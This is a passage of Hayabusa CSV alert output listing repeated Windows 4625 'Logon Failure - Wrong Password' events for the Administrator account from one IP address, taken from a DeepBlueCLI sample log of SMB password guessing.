Administrator | Type: 3 | Computer: 86lXQsnn7dae93tW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Iu8olNGPmhxh6iNu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZYtN5EMHxcNqID6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mtUQGxrMoPkpUQCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYh4e3bpePhDoRwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UkC8E9uKpCgD1BHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZCDxpmDZbpGCey3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SS2dxS3WvCrAyiB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YT3VHxKNf8q14rro | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fx9HQT3u3Ig6vJ3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FukPQsr4SXRshyTn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7AutKUyPELNRUcA4 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 38gBkWcYdZW6Wcdz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HMKnLRQCDn1CHZdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ShGnRYHfVSuPvfcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LXVWG3Yl0utv98Zf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VDfa0UebgleQMK5U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: BxTLJJsWs9dOc5JC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7cKtymmsQJSM6zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbtC0srNyvkIHOSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPGlJ6ZjGSfUKrCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Uw95Ema8vWlRXKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hHTrBmhkjGLTNt2R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJeRVGKULJIo76aa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kipf0Z2Tse2eWoxa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnP7tmMJXDVzIDim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CBeMt62oqlIICShT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIfXRZQkKRJAw4er | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wrqSJPALo5QtUnS | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81Mm67AdwpPJMCMm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jwq5jXlMRU1SNLO5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d7OYj8ynCEl5dG9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YzT8vF7ANYnjSRgd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4eYIoww4uL6oYZu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: DpO8L2Fky4zYwp2q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGmxSy48sphENTiY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tQVAkjteLFK0hbyE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMWKsQ8l0j9fZPfA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ct7xYUYH9sr7mva | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBn0XxaPOZQokJ0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nQELRxrGuXqkYgO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5eT0mykgLNZQygq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qMyIqRidF6oBdzog | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ULnnFcF98k9zpNTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j5k02pcelZNGwF3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qfcC6LqJqs0EeGjE | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXALYkkitmyAFq14 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIqQmExq22WrW4md | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ydHqjdZhLMI9gjfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSe45VZNPdovPbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hiHlcR6qNGE0P7TK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: iT3jPdHr89RqPlyd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0QFnABeYK39XEntR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5plMYSBQi5mKmdlk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TaxWckQUCMgWvCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81xZ7iisEyTABmUm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qYiQ2xjMQFQwH2XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRN8e3yzZzxc2p3A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCa6PN0C7XznvipG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hFqjIXbEb7eWUFUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkrVjLgnJZlIyXpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2r5tyuIYijAXN5be | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AgjQNe9hQrLIETDn | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNoInpFTsixZDIu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ladJUS6I0HMIwdef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oW63pJlVtjgn3YY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKNu8b2To2Y1twUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9sN5xm3GytfmM7G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: FtQQS61GYBm6WUUz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WxxawZZMhNCGHxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sKP8G2VgJlrr9LMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvOsNQpk3c5p1FgK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7oz7NPh5Z8UrDPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvzNFOLBlBv98Do4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
